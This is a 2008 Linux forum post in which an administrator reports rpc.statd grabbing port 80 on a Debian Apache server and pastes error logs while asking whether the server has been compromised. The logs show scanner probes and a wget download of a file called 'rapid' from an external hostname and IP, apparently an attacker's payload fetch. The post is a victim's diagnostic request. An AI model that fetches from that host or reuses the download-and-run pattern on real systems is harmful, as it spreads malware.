Groups > Unix Linux > Linux discussions > rpc.statd taking over port 80




rpc.statd taking over port 80

rpc.statd taking over port 80
Thu, 06 Mar 2008 04:59:07 GMT 
Hi guys.
I am running apache2 on a debian box's which is vhosting 5 websites. I am 
having a bit of a problem with rpc.statd taking over port 80 on one of them.
This has happened 3 or 4 times now. I have had a look on google but cannot 
seem to find any information on this problem.
It appears to me that it is some kind of attack on the server. I have 
attached the tail of the main apache2 error.log for the past 2 times this 
has happened. There seems to be a mkdir attempt, a wget of rapid (which i 
believe to be an ftp server) and then later on a sigterm. After this sigterm 
Apache2 shuts down and rpc.statd opens port 80 for listening.
Does anyone know of this attack or problem? It has me quite concerned of a 
server compromise.
Any help is appreciated.



[Fri Feb 22 02:10:38 2008] [error] [client 58.120.*.*] script
'/var/www/go.php' not found or unable to stat
[Fri Feb 22 09:59:08 2008] [error] [client 58.120.*.*] script
'/var/www/go.php' not found or unable to stat
[Fri Feb 22 21:23:09 2008] [error] [client 58.120.*.*] script
'/var/www/go.php' not found or unable to stat
[Sat Feb 23 04:01:25 2008] [error] [client 217.169.*.*] File does not exist:
/var/www/cloak
[Sat Feb 23 10:14:24 2008] [error] [client 204.246.*.*] File does not exist:
/var/www/cloak
[Sat Feb 23 17:48:06 2008] [error] [client 79.18.*.*] File does not exist:
/var/www/favicon.ico
mkdir: cannot create directory `"': File exists
mkdir: cannot create directory `"': File exists
--17:52:05--  http://static.213-239-221-73.clients.your-server.de/~ftp/rapid
           => `rapid'
Resolving static.213-239-221-73.clients.your-server.de... 213.239.221.73
Connecting to
static.213-239-221-73.clients.your-server.de|213.239.221.73|:80...
connected.
HTTP request sent, awaiting response... 200 OK
Length: 743,798 (726K) [text/plain]

    0K .......... .......... .......... .......... ..........  6%   36.37
KB/s
   50K .......... .......... .......... .......... .......... 13%  144.73
KB/s
  100K .......... .......... .......... .......... .......... 20%  146.32
KB/s
  150K .......... .......... .......... .......... .......... 27%    7.53
MB/s
  200K .......... .......... .......... .......... .......... 34%    1.03
MB/s
  250K .......... .......... .......... .......... .......... 41%  169.14
KB/s
  300K .......... .......... .......... .......... .......... 48%   10.11
MB/s
  350K .......... .......... .......... .......... .......... 55%  150.28
KB/s
  400K .......... .......... .......... .......... .......... 61%    6.11
MB/s
  450K .......... .......... .......... .......... .......... 68%    3.86
MB/s
  500K .......... .......... .......... .......... .......... 75%    1.86
MB/s
  550K .......... .......... .......... .......... .......... 82%  163.67
KB/s
  600K .......... .......... .......... .......... .......... 89%    4.52
MB/s
  650K .......... .......... .......... .......... .......... 96%    4.99
MB/s
  700K .......... .......... ......                          100%    7.99
MB/s

17:52:09 (232.42 KB/s) - `rapid' saved [743798/743798]

[Sat Feb 23 23:04:48 2008] [error] [client 81.27.*.*] File does not exist:
/var/www/sp_login.htm
[Sun Feb 24 06:51:05 2008] [notice] caught SIGTERM, shutting down

--------------------------------

[Fri Feb 29 03:14:53 2008] [error] [client 66.192.*.*] client sent HTTP/1.1
request without hostname (see RFC2616 section 14.23):
/w00tw00t.at.ISC.SANS.DFind:)
[Fri Feb 29 10:23:47 2008] [error] [client 58.120.*.*] script
'/var/www/go.php' not found or unable to stat
[Fri Feb 29 18:22:59 2008] [error] [client 204.246.*.*] File does not exist:
/var/www/cloak
[Sat Mar 01 03:17:07 2008] [error] [client 79.19.*.*] File does not exist:
/var/www/favicon.ico
mkdir: cannot create directory `"': File exists
mkdir: cannot create directory `"': File exists
mkdir: cannot create directory `"': File exists
mkdir: cannot create directory `"': File exists
--03:17:14--  http://static.213-239-221-73.clients.your-server.de/~ftp/rapid
           => `rapid'
Resolving static.213-239-221-73.clients.your-server.de... 213.239.221.73
Connecting to
static.213-239-221-73.clients.your-server.de|213.239.221.73|:80...
connected.
HTTP request sent, awaiting response... 200 OK
Length: 743,874 (726K) [text/plain]

    0K .......... .......... .......... .......... ..........  6%   35.66
KB/s
   50K .......... .......... .......... .......... .......... 13%  141.83
KB/s
  100K .......... .......... .......... .......... .......... 20%  143.71
KB/s
  150K .......... .......... .......... .......... .......... 27%    7.27
MB/s
  200K .......... .......... .......... .......... .......... 34%  144.84
KB/s
  250K .......... .......... .......... .......... .......... 41%    5.63
MB/s
  300K .......... .......... .......... .......... .......... 48%    1.28
MB/s
  350K .......... .......... .......... .......... .......... 55%  163.50
KB/s
  400K .......... .......... .......... .......... .......... 61%    5.63
MB/s
  450K .......... .......... .......... .......... .......... 68%    6.77
MB/s
  500K .......... .......... .......... .......... .......... 75%  149.82
KB/s
  550K .......... .......... .......... .......... .......... 82%    4.87
MB/s
  600K .......... .......... .......... .......... .......... 89%    7.11
MB/s
  650K .......... .......... .......... .......... .......... 96%  152.58
KB/s
  700K .......... .......... ......                          100%    3.78
MB/s

03:17:19 (207.08 KB/s) - `rapid' saved [743874/743874]

[Sat Mar 01 03:19:02 2008] [error] [client 193.109.*.*] request failed:
error reading the headers
[Sat Mar 01 11:28:43 2008] [error] [client 217.169.*.*] File does not exist:
/var/www/cloak
[Sun Mar 02 05:58:12 2008] [error] [client 193.109.*.*] request failed:
error reading the headers
[Sun Mar 02 07:22:18 2008] [notice] caught SIGTERM, shutting down
Post Reply
about | contact